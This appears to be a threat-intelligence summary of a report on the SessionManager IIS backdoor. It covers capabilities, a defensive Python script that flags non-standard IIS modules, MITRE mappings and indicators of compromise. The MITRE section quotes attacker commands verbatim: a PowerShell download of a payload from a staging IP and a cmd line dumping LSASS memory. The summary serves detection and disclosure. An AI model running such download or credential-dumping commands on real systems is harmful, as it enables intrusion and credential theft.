SessionManager is an IIS backdoor tied to the GELSEMIUM activity cluster that persists on compromised servers by loading a malicious IIS module after ProxyLogon-type exploits. It enables reading/writing files, remote command execution, and HTTP-based command-and-control, with multiple version updates and a wide victim footprint across NGOs, government, military, and industry clients. #GELSEMIUM #SessionManager #OwlProxy
Keypoints
- SessionManager is a malicious native-code IIS module designed to be loaded by IIS applications to process legitimate HTTP requests while executing backdoor instructions.
- It employs HTTP cookies for command and control, passing commands via cookies and returning results in HTTP responses.
- Capabilities include reading/writing/deleting files, executing arbitrary binaries, and establishing connections to arbitrary network endpoints.
- Multiple variants (V0–V3) show ongoing development with dated PDB paths, suggesting sustained maintenance since 2021.
- Over 20 organizations and 34 servers across many regions were affected, with victims spanning NGOs, governments, military, and industry.
- Post-deployment activity includes downloading tools (Dll2.dll, ssp.exe) via PowerShell, using Mimikatz-related tools, Avast memory-dump tools, and Python/PyInstaller-based loaders to evade detection.
- Attribution suggests GELSEMIUM involvement, with overlaps to OwlProxy samples and shared tooling observed on multiple campaigns.
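Because SessionManager is registered as a native IIS module, one defensive check is to enumerate the <globalModules> entries in applicationHost.config, flag any image loaded from outside the stock inetsrv directory, and compare the flagged file against the report's hashes and PDB string. The script below is an added example, not code from the Securelist report; the config fragment, the module name "CustomModule" and the %windir% expansion to C:\Windows are constructed assumptions.

```python
import hashlib
import re
import xml.etree.ElementTree as ET

# MD5 hashes of the SessionManager variants listed in the report.
SESSIONMANAGER_MD5 = {
    "5FFC31841EB3B77F41F0ACE61BECD8FD", "84B20E95D52F38BB4F6C998719660C35",
    "4EE3FB2ABA3B82171E6409E253BDDDB5", "2410D0D7C20597D9B65F237F9C4CE6C9",
}
# PDB file name embedded in the SessionManager builds described in the report.
PDB_MARKER = b"sessionmanagermodule.pdb"
# Stock IIS native modules live here; %windir% is assumed to be C:\Windows.
TRUSTED_DIR = "c:\\windows\\system32\\inetsrv\\"

# Constructed applicationHost.config fragment (not from any real host):
# two stock modules plus one image loaded from the Temp path named in the report.
SAMPLE_CONFIG = r"""<configuration><system.webServer><globalModules>
  <add name="UriCacheModule" image="%windir%\System32\inetsrv\cachuri.dll" />
  <add name="StaticCompressionModule" image="%windir%\System32\inetsrv\compstat.dll" />
  <add name="CustomModule" image="C:\Windows\Temp\win32.dll" />
</globalModules></system.webServer></configuration>"""


def normalize_image(image: str) -> str:
    """Lower-case the path and expand %windir%/%SystemRoot% for the prefix check."""
    return re.sub(r"%(windir|systemroot)%", r"c:\\windows", image.strip().lower())


def suspicious_modules(config_xml: str) -> list:
    """Return <globalModules> entries whose image sits outside the trusted inetsrv dir."""
    root = ET.fromstring(config_xml)
    hits = []
    for section in root.iter("globalModules"):
        for add in section.findall("add"):
            image = add.get("image", "")
            if image and not normalize_image(image).startswith(TRUSTED_DIR):
                hits.append({"name": add.get("name"), "image": image})
    return hits


def md5_hex(data: bytes) -> str:
    return hashlib.md5(data).hexdigest().upper()


def classify_image(data: bytes) -> str:
    """Rate a flagged module's bytes: known hash, PDB string present, or unknown."""
    if md5_hex(data) in SESSIONMANAGER_MD5:
        return "known-sessionmanager"
    if PDB_MARKER in data.lower():
        return "pdb-string-match"
    return "unknown"  # not an indicator match; still review a non-stock native module


if __name__ == "__main__":
    for mod in suspicious_modules(SAMPLE_CONFIG):
        print(f"non-standard native module: {mod['name']} -> {mod['image']}")
```

On a live host, read each flagged image's bytes and pass them to classify_image(); an "unknown" result only means the indicators on this page did not match.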
MITRE Techniques
- [T1071.001] Web Protocols – The backdoor uses HTTP cookies to receive commands and inserts results into HTTP responses. “Commands are passed from an operator to SessionManager using a specific HTTP cookie name. The answer from the backdoor to an operator will usually be inserted in the body of the server HTTP response.”
- [T1059.001] PowerShell – Used to fetch payloads from a remote server (e.g., Dll2.dll, ssp.exe) via PowerShell commands. “powershell "(New-Object Net.WebClient).DownloadFile('hxxp://202.182.123[.]185/Dll2.dll','C:\Windows\Temp\win32.dll')"”
- [T1105] Ingress Tool Transfer – Downloading additional tools/payloads from a remote server as part of access expansion. “DownloadFile('…/Dll2.dll')” and related artifacts from 202.182.123[.]185
- [T1059.003] Windows Command Shell – Execution of commands via cmd.exe, including remote execution attempts. “C:\Windows\Temp\vmmsi.exe cmd.exe(-)/c(-)"winchecksec.exe -accepteula -ma lsass.exe seclog.dmp"”
- [T1003.001] OS Credential Dumping – Post-deployment usage of Mimikatz-related tools to extract credentials and LSASS memory. “Mimikatz SSP and Avast memory dump tools” and attempts to read LSASS memory.
- [T1027] Obfuscated/Compressed Files and Information – Operators used PyInstaller-packed Python scripts to obfuscate command execution. “custom PyInstaller-packed Python scripts to obfuscate command execution attempts.”
- [T1543.003] Create or Modify System Process: Windows Service – Operators launched launcher scripts through the Windows services manager command line. “launcher scripts through the Windows services manager command line.”
- [T1041] Exfiltration Over C2 Channel – Command results are returned within HTTP responses, signaling data exfiltration over the C2 channel. “The results of executed commands are returned as body data within HTTP responses.”
Indicators of Compromise
- [IP] IP addresses – 202.182.123[.]185 (staging server, used between March and April 2021 at least), 207.148.109[.]111 (unidentified infrastructure)
- [MD5] SessionManager variants – 5FFC31841EB3B77F41F0ACE61BECD8FD, 84B20E95D52F38BB4F6C998719660C35, 4EE3FB2ABA3B82171E6409E253BDDDB5, 2410D0D7C20597D9B65F237F9C4CE6C9
- [MD5] Mimikatz runners – 95EBBF04CEFB39DB5A08DC288ADD2BBC, F189D8EFA0A8E2BEE1AA1A6CA18F6C2B
- [MD5] PyInstaller-packed process creation wrapper – 65DE95969ADBEDB589E8DAFE903C5381
- [MD5] OwlProxy variant samples – 235804E3577EA3FE13CE1A7795AD5BF9, 30CDA3DFF9123AD3B3885B4EA9AC11A8
- [File path] SessionManager-related DLL/EXE paths – C:\Windows\Temp\win32.dll, C:\Windows\Temp\win32.exe, and other listed paths
- [PDB Path] SessionManager-related PDBs – C:\Users\GodLike\Desktop\tt4\SessionManagerModule\x64\Release\sessionmanagermodule.pdb, C:\Users\GodLike\Desktop\tt4\SessionManagerV3Module\x64\Release\sessionmanagermodule.pdb
Read more: https://securelist.com/the-sessionmanager-iis-backdoor/106868/